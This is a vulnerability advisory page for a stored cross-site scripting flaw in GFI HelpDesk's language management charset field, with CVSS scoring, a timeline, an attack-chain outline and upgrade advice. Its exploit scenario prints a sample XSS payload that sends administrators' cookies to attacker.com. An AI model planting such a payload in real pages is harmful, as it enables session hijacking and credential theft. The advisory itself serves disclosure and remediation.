Skip to main content

Helpdesk EUVD-2026-23928

| CVE-2026-23753 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-04-20 VulnCheck GHSA-xj4v-3q69-qpxx
XSS Helpdesk
4.8
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
4.8 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
P
Scope
X

Lifecycle Timeline

5
Analysis Generated
Apr 20, 2026 - 18:28 vuln.today
EUVD ID Assigned
Apr 20, 2026 - 18:00 euvd
EUVD-2026-23928
Analysis Generated
Apr 20, 2026 - 18:00 vuln.today
Patch released
Apr 20, 2026 - 18:00 nvd
Patch available
CVE Published
Apr 20, 2026 - 17:33 nvd
MEDIUM 4.8

DescriptionCVE.org

GFI HelpDesk before 4.99.9 contains a stored cross-site scripting vulnerability in the language management functionality where the charset POST parameter is passed directly to SWIFT_Language::Create() without HTML sanitization and subsequently rendered unsanitized by View_Language.RenderGrid(). An authenticated administrator can inject arbitrary JavaScript through the charset field when creating or editing a language, and the payload executes in the browser of any administrator viewing the Languages page.

AnalysisAI

GFI HelpDesk before version 4.99.9 contains a stored cross-site scripting vulnerability in language management where the charset POST parameter is not HTML-sanitized before being rendered by the View_Language.RenderGrid() function. An authenticated administrator can inject arbitrary JavaScript through the charset field when creating or editing a language, with the payload executing in the browsers of other administrators viewing the Languages page. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Obtain administrator credentials
Delivery
Access language management interface
Exploit
Inject XSS payload in charset field
Install
Payload stored in database
C2
Victim admin views Languages page
Execute
JavaScript executes in victim browser
Impact
Session hijacking or credential theft
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires a valid administrator account with access to the language management functionality in GFI HelpDesk. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment CVSS 4.8 (Medium) with network vector, low complexity, and high privileges required (PR:H) reflects the moderate real-world risk. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A malicious administrator or an attacker who has compromised an administrator account logs into GFI HelpDesk and navigates to the language management section. They create a new language or edit an existing one, injecting a JavaScript payload such as '<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">' into the charset field. …
Remediation Upgrade GFI HelpDesk to version 4.99.9 or later, which addresses the vulnerability by implementing proper input sanitization and output encoding in the language management functionality. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-23928 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy